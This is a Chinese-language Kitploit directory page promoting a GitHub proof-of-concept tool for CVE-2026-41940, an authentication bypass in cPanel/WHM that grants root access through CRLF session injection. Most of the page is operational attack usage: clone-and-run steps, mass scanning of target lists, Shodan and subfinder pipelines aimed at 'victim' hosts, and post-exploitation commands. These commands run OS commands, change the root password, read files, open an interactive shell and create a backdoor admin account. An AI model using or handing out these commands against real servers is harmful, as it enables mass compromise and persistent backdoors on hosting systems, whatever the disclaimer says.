Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-41940-PoC — 针对 CVE-2026-41940 的漏洞利用程序,这是 cPanel/WHM 中一个未经验证的身份验证绕过漏洞,可通过 CRLF 会话注入获得 root 级别的 WHM 访问权限,并附带漏洞利用后的命令和交互式 shell。 | Kitploit
工具/GitHubGitHub/pemarine/cve-2026-41940-poc
身份验证与授权权限提升漏洞利用Web应用程序漏洞利用后渗透利用渗透测试
GitHubpemarine/cve-2026-41940-poc

cve-2026-41940-PoC

针对 CVE-2026-41940 的漏洞利用程序,这是 cPanel/WHM 中一个未经验证的身份验证绕过漏洞,可通过 CRLF 会话注入获得 root 级别的 WHM 访问权限,并附带漏洞利用后的命令和交互式 shell。

查看仓库
270127天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41940

⚠ 此工具仅用于教育或漏洞赏金目的。严禁在受控环境之外未经授权使用。

描述

一个用于利用 CVE-2026-41940 的工具,这是 cPanel & WHM 中的一个严重身份验证绕过漏洞(CVSS 10.0),允许未经身份验证的攻击者通过 Authorization 头向服务器端会话文件注入 CRLF 序列,从而获得 root 级别的 WHM 访问权限 —— 无需任何凭据。

工作原理

CVE-2026-41940 通常是通过 cPanel/WHM 对身份验证会话处理机制中的缺陷来利用的。攻击通常从向登录界面发送一个正常请求开始,此时应用程序在完全验证用户凭据之前过早地初始化了会话。由于对与会话相关的输入处理不当,某些特制或意外的输入结构可以改变服务器存储或解释会话数据的方式。

受影响版本

版本受影响版本已修复版本
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

安装(Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/pemarine/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

使用方法

该工具需要指定一个目标域名。

单目标模式:

root@kitploit:~
python cve.py -u https://target1.com:2083

你也可以从 target.txt 文件中进行扫描(请先创建它):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

基本扫描:

可用命令:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # single target scan
python cve.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python cve.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

后渗透操作

root@kitploit:~
# List all accounts on the server
python cve.py list -u https://target.com:2087

# OS command
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python cve.py info -u https://target.com:2087

# Change root password
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python cve.py shell -u https://target.com:2087

管道

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM Shell 模式

成功执行后,你可以打开一个交互式 WHM shell:

root@kitploit:~
python cve.py shell -u

所有 Shell 命令


CLI 参考

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

免责声明

⚠ 此工具仅用于教育或漏洞赏金目的。严禁在受控环境之外未经授权使用。

下载工具
命令描述
id显示用户 ID
hostname获取服务器主机名
accounts列出所有用户账户
info负载、磁盘、MySQL 主机、版本
cat <path>读取文件内容
exec <cmd>执行操作系统命令
newadmin <user> <pass>创建后门 WHM 管理员
passwd <pass>更改 root 密码
l [path]列出目录内容
help显示所有命令
exit退出 Shell 模式